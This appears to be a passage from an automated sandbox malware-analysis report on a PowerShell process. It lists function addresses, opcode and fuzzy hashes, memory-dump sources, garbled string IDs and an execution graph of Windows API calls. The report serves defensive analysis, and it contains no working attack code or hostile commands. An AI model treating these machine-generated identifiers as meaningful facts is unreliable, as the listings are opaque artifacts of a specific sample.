                                            • Opcode Fuzzy Hash: f470ac3eb6b7cfc7b0ca7febc1f7820d66f0be241de78615f8259886233ce2c1
                                            • Instruction Fuzzy Hash: 31E0263530465487CB4D2B75A00C6EEBA5ADBD5721F00013EE50AC3382EF795805D3D9
                                            Function 0464FAB8 Relevance: .0, Instructions: 21COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3348365721.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4640000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fb46b9f4fe5505d6f026fded79eb701cea3e05018ed62bdcdf40e78880314138
                                            • Instruction ID: f02586f4b2714120f3e9735d20a1f05aea50d7775fe3281b8dfce626b0e9f4ef
                                            • Opcode Fuzzy Hash: fb46b9f4fe5505d6f026fded79eb701cea3e05018ed62bdcdf40e78880314138
                                            • Instruction Fuzzy Hash: 35E0D8319041CDCACB49EBB9E0574FC7F70FE21211B00019ED507669A3EA20014ECF82
                                            Function 0464FEBF Relevance: .0, Instructions: 20COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3348365721.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4640000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ac9c03cecfbd046144a75bb49bbbd0f10ee54b47db94dca7ce56b3d60b5957de
                                            • Instruction ID: c9f39dfad05b11b0e079401761dfb932c3909b9ce00b36414fcb6b66ac6ea443
                                            • Opcode Fuzzy Hash: ac9c03cecfbd046144a75bb49bbbd0f10ee54b47db94dca7ce56b3d60b5957de
                                            • Instruction Fuzzy Hash: BFE04F74D042459F8B80DFB894815EDFFF0EB5A210F2485AAC819D7211E7328613CFA1
                                            Function 0464FED0 Relevance: .0, Instructions: 16COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3348365721.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4640000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                            • Instruction ID: 10825a5e605db1370b7c06a9e7e4ab308319de417855d727831608b6a67abd99
                                            • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                            • Instruction Fuzzy Hash: 30D06270D042099F8784EFADC94156DFBF4EB59200F5485AA9919D7301F73156128BD1
                                            Function 0464FAC8 Relevance: .0, Instructions: 15COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3348365721.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4640000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5bfe9ff392169e722faa809f4d517eb06daac2714d23e57f58e68eb9b32f0240
                                            • Instruction ID: ecba4d59c36a4433088f1e7b4a60bd7e85e7c2bcb2c2af98df4c190c5675507c
                                            • Opcode Fuzzy Hash: 5bfe9ff392169e722faa809f4d517eb06daac2714d23e57f58e68eb9b32f0240
                                            • Instruction Fuzzy Hash: 66D06731A0410DCBCB88EBA5E95A4BDBBB4EB20201F40016DEA17921D1EA24295ADBC1
                                            Function 0464FB90 Relevance: .0, Instructions: 15COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3348365721.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4640000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b07efe4ea2f6d747a99b9c16eaece292215742f841ffce623dc3670ab1e2bfc1
                                            • Instruction ID: db56177d8db25069b737d284c728ffe95b0bf5c99c9047fa4355d4c2f771ddaf
                                            • Opcode Fuzzy Hash: b07efe4ea2f6d747a99b9c16eaece292215742f841ffce623dc3670ab1e2bfc1
                                            • Instruction Fuzzy Hash: E4D01734A0420CCBCB88EFA5E44A96EBFB4EB54204F000168E90A93380EA302846DBC1
                                            Function 074D1CB6 Relevance: .0, Instructions: 5COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3357760203.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_74d0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8fc632965fc5a2d5aa5827a808c7a340000c18b441ee07ee03c0bfb3c0d38b3c
                                            • Instruction ID: dbde001ce5136061092a68873f645d57de79bb6cf3b81d90dc4719fa97a89b8d
                                            • Opcode Fuzzy Hash: 8fc632965fc5a2d5aa5827a808c7a340000c18b441ee07ee03c0bfb3c0d38b3c
                                            • Instruction Fuzzy Hash: 9DA011B03000008BC200CA00C882800B320AB82208B28C888A8288F282CB23E8038A80

                                            Non-executed Functions

                                            Function 074DF190 Relevance: 18.0, Strings: 14, Instructions: 497COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3357760203.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_74d0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'fq$4'fq$XRkq$XRkq$XRkq$tPfq$tPfq$tPfq$tPfq$$fq$$fq$$fq$$fq$$fq
                                            • API String ID: 0-2218299458
                                            • Opcode ID: 61c454c0196b6d8706d1e1d3f28796e5e7877b037d252284a5de728950099ec4
                                            • Instruction ID: dc11e5a7df581f4ab41ef9e61f2951cbfc7e956286584c19e13d5da3e8c8d542
                                            • Opcode Fuzzy Hash: 61c454c0196b6d8706d1e1d3f28796e5e7877b037d252284a5de728950099ec4
                                            • Instruction Fuzzy Hash: 0C022AB1710206DFCB348FA8C4646EF7BA2AF85310F14845BE9569B391DB31DD4ACBA1
                                            Function 074DE1E9 Relevance: 14.0, Strings: 11, Instructions: 266COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3357760203.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_74d0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ($4'fq$4'fq$d%lq$d%lq$d%lq$d%lq$tPfq$tPfq$x($$fq
                                            • API String ID: 0-799826672
                                            • Opcode ID: 4c70d722b5e86bc0c995c0109af0ef229c7e1bc38e5e28f0bd2c81c01e49b790
                                            • Instruction ID: e3fa0659d80a36a5ee96c2dd98771bbd66dcac1d0b6dadcc745cceb15a24e09e
                                            • Opcode Fuzzy Hash: 4c70d722b5e86bc0c995c0109af0ef229c7e1bc38e5e28f0bd2c81c01e49b790
                                            • Instruction Fuzzy Hash: 3F9138B17142669FCB259F68C8646EB7BA2EF85710F14845BE881CF391DB31DC41C7A1
                                            Function 074DBB68 Relevance: 12.9, Strings: 10, Instructions: 423COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3357760203.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_74d0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$$fq$$fq$$fq$$fq
                                            • API String ID: 0-2681546525
                                            • Opcode ID: 6e2001f94e60de9cfdd09cebf5845a123a09f686a5d700625c6650a033999889
                                            • Instruction ID: 3e5a36addf9046c527881adc8a37eeca775581498c5130f681fd3d7fbe38dfeb
                                            • Opcode Fuzzy Hash: 6e2001f94e60de9cfdd09cebf5845a123a09f686a5d700625c6650a033999889
                                            • Instruction Fuzzy Hash: 75123FB4A102199FCB24DB68C990BDBBBB2FF85304F1085D9D5096B781CB72AD85CF91
                                            Function 074D7E48 Relevance: 11.7, Strings: 9, Instructions: 434COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3357760203.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_74d0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'fq$4'fq$$fq$$fq$$fq$$fq$$fq$$fq$$fq
                                            • API String ID: 0-766573554
                                            • Opcode ID: e402a983ac91bd3b7c1c20a27d5f6ac17da51eacd651e065121f22da8f36ed01
                                            • Instruction ID: c758958456d3101a7ce29885dcf0e9ffc1e327bbec57c9bed5870e525a2c7fbd
                                            • Opcode Fuzzy Hash: e402a983ac91bd3b7c1c20a27d5f6ac17da51eacd651e065121f22da8f36ed01
                                            • Instruction Fuzzy Hash: BCD13BB1B143468FCB269B7888617FB7BA6AF85200F1484ABD585CB792DA31CC45C7A1
                                            Function 074D8D58 Relevance: 9.2, Strings: 7, Instructions: 483COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3357760203.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_74d0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'fq$4'fq$tPfq$tPfq$$fq$$fq$$fq
                                            • API String ID: 0-332123906
                                            • Opcode ID: 2f1e87292abc24aaa4daabf1dc99f3cc585ceb0864f67d3fcb779ae40cd2126c
                                            • Instruction ID: 75c5ba7765afff4bc2fa986bccb3bd9706fe694526790468e5045b3d1f84ea55
                                            • Opcode Fuzzy Hash: 2f1e87292abc24aaa4daabf1dc99f3cc585ceb0864f67d3fcb779ae40cd2126c
                                            • Instruction Fuzzy Hash: E8F148B2B042158FCB158FA898216FBBBB6EFC6210F1484ABD585CB791DB31DC45C7A1
                                            Function 074D0840 Relevance: 9.0, Strings: 7, Instructions: 207COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3357760203.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_74d0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'fq$4'fq$4'fq$4'fq$$fq$$fq$$fq
                                            • API String ID: 0-4070656019
                                            • Opcode ID: 080b1087f9dac2d28d2afa930e33bd18b0c33ee7e31f9b8f7e2a57d0e278a4a1
                                            • Instruction ID: 2a7aa67ccfc2e44b4ff804f88a286da935fb86b264577afb7ee65df2b7b2c7ec
                                            • Opcode Fuzzy Hash: 080b1087f9dac2d28d2afa930e33bd18b0c33ee7e31f9b8f7e2a57d0e278a4a1
                                            • Instruction Fuzzy Hash: 2B613AB17143458FDB258AB984216FB7BA7AFC2310F14846BE585CB7A1DA31CC45C7A1
                                            Function 074DE774 Relevance: 8.9, Strings: 7, Instructions: 159COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3357760203.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_74d0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'fq$TQkq$TQkq$tPfq$$fq$$fq$$fq
                                            • API String ID: 0-1114105955
                                            • Opcode ID: 7a6c90ae47ce99fe3ebc12aaa982082c3a80317908675ad30ce07bc2212624b4
                                            • Instruction ID: 9e3f7a72cb9b9a848a02ea955da0fa4b6dcf2d6f980c79e4d27abe69fad5d9fa
                                            • Opcode Fuzzy Hash: 7a6c90ae47ce99fe3ebc12aaa982082c3a80317908675ad30ce07bc2212624b4
                                            • Instruction Fuzzy Hash: CF51DFB0611266DFDF248E05C564BEB77A2BF42311F5888ABE8859F391C771DC81CB92
                                            Function 074DE241 Relevance: 7.7, Strings: 6, Instructions: 163COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3357760203.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_74d0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'fq$d%lq$d%lq$d%lq$tPfq$$fq
                                            • API String ID: 0-3915454692
                                            • Opcode ID: 463ae711fd0e0469bd8b26da27f08b605b1c854e376b619291ae812d4fe001dd
                                            • Instruction ID: cff4ea3c620d125f0f00fd7cb7762ed9a7ab322d3c60f8facedb212554616c0f
                                            • Opcode Fuzzy Hash: 463ae711fd0e0469bd8b26da27f08b605b1c854e376b619291ae812d4fe001dd
                                            • Instruction Fuzzy Hash: FC51E1F06102269FCB248F64C464BEBBBB6EF85650F59849BE8809F391D771DD40CBA1
                                            Function 074DE5C0 Relevance: 6.4, Strings: 5, Instructions: 122COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3357760203.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_74d0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'fq$4'fq$$fq$$fq$$fq
                                            • API String ID: 0-3759051638
                                            • Opcode ID: 8ef02d325b1297c59c5f9077d4c4381b8f742f73bfc8302095bddf183327feeb
                                            • Instruction ID: 11585d471450cb50a9ed49629289803c39ffb6924222f38c2b19ebf3333f69f1
                                            • Opcode Fuzzy Hash: 8ef02d325b1297c59c5f9077d4c4381b8f742f73bfc8302095bddf183327feeb
                                            • Instruction Fuzzy Hash: E941A7F5B10226CBCB248EA984646FBB7E6AF85250F64847BC599CB341DB35CC42C761
                                            Function 074DE386 Relevance: 6.3, Strings: 5, Instructions: 85COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3357760203.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_74d0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'fq$d%lq$d%lq$d%lq$tPfq
                                            • API String ID: 0-3104067135
                                            • Opcode ID: 3d659551b7bd24948f6fe2efe6dc7330878b8595247e313cb77e4b7e38e6b2a4
                                            • Instruction ID: 4189c94463cfe7863947280aa1bd7f7893275ea480a58ffb3790235aad0c8447
                                            • Opcode Fuzzy Hash: 3d659551b7bd24948f6fe2efe6dc7330878b8595247e313cb77e4b7e38e6b2a4
                                            • Instruction Fuzzy Hash: 5031C2B0B50225DFCB24DF68C458AABBBA2FF88B10F14844AE845AF351C771EC01CB91
                                            Function 092B0880 Relevance: 6.3, Strings: 5, Instructions: 78COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3360898996.00000000092B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_92b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: tPfq$$fq$$fq$$fq$$fq
                                            • API String ID: 0-3108386057
                                            • Opcode ID: aedae19132bb79edd1134f4103c92a15bfbd211a159ce5a3eed141d0c7463452
                                            • Instruction ID: 4ac751afb6a1d0ea77d25910588eb57de3ac08ca63bf7049ecaea92247ec82e8
                                            • Opcode Fuzzy Hash: aedae19132bb79edd1134f4103c92a15bfbd211a159ce5a3eed141d0c7463452
                                            • Instruction Fuzzy Hash: 3A210B326612068FEB318E54CA40ABB77F5AF80BD0F144155E9149F399D771DD04C7D1
                                            Function 092B0888 Relevance: 6.3, Strings: 5, Instructions: 77COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3360898996.00000000092B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 092B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_92b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: tPfq$$fq$$fq$$fq$$fq
                                            • API String ID: 0-3108386057
                                            • Opcode ID: db03da5f4323e8ccfe43d6f6586d9cf7be6f967a9508a34c4d90998d3bfbe1a6
                                            • Instruction ID: 8b471436e9204a0065ec2719b1201d25f643b924f0d2044d875e041539728249
                                            • Opcode Fuzzy Hash: db03da5f4323e8ccfe43d6f6586d9cf7be6f967a9508a34c4d90998d3bfbe1a6
                                            • Instruction Fuzzy Hash: 062108326612069FEB218E55CA40AAB77F5AF80BD0F144055E9049F359C771D904C7D1
                                            Function 074DDB50 Relevance: 5.5, Strings: 4, Instructions: 480COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3357760203.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_74d0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (ofq$(ofq$(ofq$(ofq
                                            • API String ID: 0-875029461
                                            • Opcode ID: 5b8f59f60fceb2eb0b524c65239f573e014a920f86d8752ad6f895448cd4514e
                                            • Instruction ID: 0dbcb2cbb8bfd31ce0aa1d5c1ddfdb7996a873931cec6d778e3ea43897929be4
                                            • Opcode Fuzzy Hash: 5b8f59f60fceb2eb0b524c65239f573e014a920f86d8752ad6f895448cd4514e
                                            • Instruction Fuzzy Hash: B2F1F1B1B04319DFCB258F68C8647EBBBA2AF85314F14846BE5958B291CB35DC41CBA1
                                            Function 074DF558 Relevance: 5.1, Strings: 4, Instructions: 115COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3357760203.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_74d0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: XRkq$XRkq$tPfq$$fq
                                            • API String ID: 0-1861106669
                                            • Opcode ID: ff2d0281c2891cdaab0ed60af113c3363f9f4ec27cff8f59d459f6ae96b5fb94
                                            • Instruction ID: c9d342cf3287d3c0131bcf605dcd474caca8f9b6c55bcf1de1732a04f5523d9b
                                            • Opcode Fuzzy Hash: ff2d0281c2891cdaab0ed60af113c3363f9f4ec27cff8f59d459f6ae96b5fb94
                                            • Instruction Fuzzy Hash: FE4192B1A00205DBCB34CF58C164AEAB7F2AF49710F19C49BE4A65B755C731DD49CB60
                                            Function 074DADC8 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3357760203.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_74d0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $fq$$fq$$fq$$fq
                                            • API String ID: 0-2113499236
                                            • Opcode ID: 967e3602eb537a301f190e36628fc5ee6d7369ed89a70a6d211585acc5a58cd2
                                            • Instruction ID: acf11145a1d4eb6d70ee922fa21b49567b54517570b3d23bccb285a0f2f7acf6
                                            • Opcode Fuzzy Hash: 967e3602eb537a301f190e36628fc5ee6d7369ed89a70a6d211585acc5a58cd2
                                            • Instruction Fuzzy Hash: 312144F23503025BDF349AAA88607A7B69B9FC9711F24C82BA585CB781DE35CC41C3A1
                                            Function 074D7E2D Relevance: 5.1, Strings: 4, Instructions: 81COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3357760203.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_74d0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $fq$$fq$$fq$$fq
                                            • API String ID: 0-2113499236
                                            • Opcode ID: 644db312889f154447575cbd6efcad0b9fed53f98a3eeb12428ffdefbf108cc2
                                            • Instruction ID: 3c3689fe43b8a67bf4f6d6fdfd18f97ad2e77de0a208718fc6ab54d777a28e4e
                                            • Opcode Fuzzy Hash: 644db312889f154447575cbd6efcad0b9fed53f98a3eeb12428ffdefbf108cc2
                                            • Instruction Fuzzy Hash: F921E0F1A053468BCB328F6484602E7BBB4AF5A350F1885AFD8C487382D735CC45C7A2
                                            Function 074D0309 Relevance: 5.0, Strings: 4, Instructions: 49COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.3357760203.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_74d0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'fq$4'fq$$fq$$fq
                                            • API String ID: 0-2206495126
                                            • Opcode ID: 143932365ee43006f888d1e2336c94285dd4fb67dff92931b33dc48d9f9066e3
                                            • Instruction ID: bde00e6d6f86dbdbae772b712bc7d9e80a505529e950dc2079aa689540265cec
                                            • Opcode Fuzzy Hash: 143932365ee43006f888d1e2336c94285dd4fb67dff92931b33dc48d9f9066e3
                                            • Instruction Fuzzy Hash: D201DF6170A3C58FC72B022808206A67FB79FC3650B2941DBC080CF3E7CE598C4A83A7

                                            Execution Graph

                                            Execution Coverage:6%
                                            Dynamic/Decrypted Code Coverage:9.2%
                                            Signature Coverage:3.5%
                                            Total number of Nodes:2000
                                            Total number of Limit Nodes:64
                                            execution_graph 37499 44dea5 37500 44deb5 FreeLibrary 37499->37500 37501 44dec3 37499->37501 37500->37501 40081 4147f3 40084 414561 40081->40084 40083 414813 40085 41456d 40084->40085 40086 41457f GetPrivateProfileIntW 40084->40086 40089 4143f1 memset _itow WritePrivateProfileStringW 40085->40089 40086->40083 40088 41457a 40088->40083 40089->40088 37502 4287c1 37503 4287d2 37502->37503 37504 429ac1 37502->37504 37506 428818 37503->37506 37507 42881f 37503->37507 37522 425711 37503->37522 37516 425ad6 37504->37516 37572 415c56 11 API calls 37504->37572 37539 42013a 37506->37539 37567 420244 97 API calls 37507->37567 37510 4260dd 37566 424251 120 API calls 37510->37566 37514 4259da 37565 416760 11 API calls 37514->37565 37519 429a4d 37520 429a66 37519->37520 37521 429a9b 37519->37521 37568 415c56 11 API calls 37520->37568 37534 429a96 37521->37534 37570 416760 11 API calls 37521->37570 37522->37504 37522->37514 37522->37519 37523 422aeb memset memcpy memcpy 37522->37523 37526 4260a1 37522->37526 37535 4259c2 37522->37535 37538 425a38 37522->37538 37555 4227f0 memset memcpy 37522->37555 37556 422b84 15 API calls 37522->37556 37557 422b5d memset memcpy memcpy 37522->37557 37558 422640 13 API calls 37522->37558 37560 4241fc 11 API calls 37522->37560 37561 42413a 90 API calls 37522->37561 37523->37522 37564 415c56 11 API calls 37526->37564 37529 429a7a 37569 416760 11 API calls 37529->37569 37571 424251 120 API calls 37534->37571 37535->37516 37559 415c56 11 API calls 37535->37559 37538->37535 37562 422640 13 API calls 37538->37562 37563 4226e0 12 API calls 37538->37563 37540 42014c 37539->37540 37543 420151 37539->37543 37582 41e466 97 API calls 37540->37582 37542 420162 37542->37522 37543->37542 37544 4201b3 37543->37544 37545 420229 37543->37545 37546 4201b8 37544->37546 37547 4201dc 37544->37547 37545->37542 37548 41fd5e 86 API calls 37545->37548 37573 41fbdb 37546->37573 37547->37542 37551 4201ff 37547->37551 37579 41fc4c 37547->37579 37548->37542 37551->37542 37554 42013a 97 API calls 37551->37554 37554->37542 37555->37522 37556->37522 37557->37522 37558->37522 37559->37514 37560->37522 37561->37522 37562->37538 37563->37538 37564->37514 37565->37510 37566->37516 37567->37522 37568->37529 37569->37534 37570->37534 37571->37504 37572->37514 37574 41fbf1 37573->37574 37575 41fbf8 37573->37575 37578 41fc39 37574->37578 37597 4446ce 11 API calls 37574->37597 37587 41ee26 37575->37587 37578->37542 37583 41fd5e 37578->37583 37580 41ee6b 86 API calls 37579->37580 37581 41fc5d 37580->37581 37581->37547 37582->37543 37585 41fd65 37583->37585 37584 41fdab 37584->37542 37585->37584 37586 41fbdb 86 API calls 37585->37586 37586->37585 37588 41ee41 37587->37588 37589 41ee32 37587->37589 37598 41edad 37588->37598 37601 4446ce 11 API calls 37589->37601 37592 41ee3c 37592->37574 37595 41ee58 37595->37592 37603 41ee6b 37595->37603 37597->37578 37607 41be52 37598->37607 37601->37592 37602 41eb85 11 API calls 37602->37595 37604 41ee70 37603->37604 37605 41ee78 37603->37605 37660 41bf99 86 API calls 37604->37660 37605->37592 37608 41be6f 37607->37608 37609 41be5f 37607->37609 37612 41be8c 37608->37612 37639 418c63 memset memset 37608->37639 37638 4446ce 11 API calls 37609->37638 37614 41be69 37612->37614 37615 41bf3a 37612->37615 37616 41bed1 37612->37616 37624 41bee7 37612->37624 37614->37592 37614->37602 37642 4446ce 11 API calls 37615->37642 37618 41bef0 37616->37618 37620 41bee2 37616->37620 37619 41bf01 37618->37619 37618->37624 37621 41bf24 memset 37619->37621 37623 41bf14 37619->37623 37640 418a6d memset memcpy memset 37619->37640 37628 41ac13 37620->37628 37621->37614 37641 41a223 memset memcpy memset 37623->37641 37624->37614 37643 41a453 86 API calls 37624->37643 37627 41bf20 37627->37621 37629 41ac52 37628->37629 37630 41ac3f memset 37628->37630 37632 41ac6a 37629->37632 37644 41dc14 19 API calls 37629->37644 37637 41acd9 37630->37637 37634 41aca1 37632->37634 37645 41519d 37632->37645 37635 41acc0 memset 37634->37635 37636 41accd memcpy 37634->37636 37634->37637 37635->37637 37636->37637 37637->37624 37638->37614 37639->37612 37640->37623 37641->37627 37642->37624 37644->37632 37648 4175ed 37645->37648 37656 417570 SetFilePointer 37648->37656 37651 41760a ReadFile 37652 417637 37651->37652 37653 417627 GetLastError 37651->37653 37654 4151b3 37652->37654 37655 41763e memset 37652->37655 37653->37654 37654->37634 37655->37654 37657 41759c GetLastError 37656->37657 37659 4175b2 37656->37659 37658 4175a8 GetLastError 37657->37658 37657->37659 37658->37659 37659->37651 37659->37654 37660->37605 37661 417bc5 37662 417c61 37661->37662 37667 417bda 37661->37667 37663 417bf6 UnmapViewOfFile CloseHandle 37663->37663 37663->37667 37665 417c2c 37665->37667 37673 41851e 20 API calls 37665->37673 37667->37662 37667->37663 37667->37665 37668 4175b7 37667->37668 37669 4175d6 CloseHandle 37668->37669 37670 4175c8 37669->37670 37671 4175df 37669->37671 37670->37671 37672 4175ce Sleep 37670->37672 37671->37667 37672->37669 37673->37665 37674 4152c7 malloc 37675 4152ef 37674->37675 37677 4152e2 37674->37677 37678 416760 11 API calls 37675->37678 37678->37677 40090 4148b6 FindResourceW 40091 4148f9 40090->40091 40092 4148cf SizeofResource 40090->40092 40092->40091 40093 4148e0 LoadResource 40092->40093 40093->40091 40094 4148ee LockResource 40093->40094 40094->40091 37679 415308 free 40095 441b3f 40105 43a9f6 40095->40105 40097 441b61 40278 4386af memset 40097->40278 40099 44189a 40100 442bd4 40099->40100 40101 4418e2 40099->40101 40102 4418ea 40100->40102 40280 441409 memset 40100->40280 40101->40102 40279 4414a9 12 API calls 40101->40279 40106 43aa20 40105->40106 40107 43aadf 40105->40107 40106->40107 40108 43aa34 memset 40106->40108 40107->40097 40109 43aa56 40108->40109 40110 43aa4d 40108->40110 40281 43a6e7 40109->40281 40289 42c02e memset 40110->40289 40115 43aad3 40291 4169a7 11 API calls 40115->40291 40116 43aaae 40116->40107 40116->40115 40131 43aae5 40116->40131 40118 43ac18 40120 43ac47 40118->40120 40293 42bbd5 memcpy memcpy memcpy memset memcpy 40118->40293 40121 43aca8 40120->40121 40294 438eed 16 API calls 40120->40294 40125 43acd5 40121->40125 40296 4233ae 11 API calls 40121->40296 40124 43ac87 40295 4233c5 16 API calls 40124->40295 40297 423426 11 API calls 40125->40297 40129 43ace1 40298 439811 163 API calls 40129->40298 40130 43a9f6 161 API calls 40130->40131 40131->40107 40131->40118 40131->40130 40292 439bbb 22 API calls 40131->40292 40133 43acfd 40139 43ad2c 40133->40139 40299 438eed 16 API calls 40133->40299 40135 43ad19 40300 4233c5 16 API calls 40135->40300 40136 43ad58 40301 44081d 163 API calls 40136->40301 40139->40136 40141 43add9 40139->40141 40141->40141 40305 423426 11 API calls 40141->40305 40142 43ae3a memset 40143 43ae73 40142->40143 40306 42e1c0 147 API calls 40143->40306 40144 43adab 40303 438c4e 163 API calls 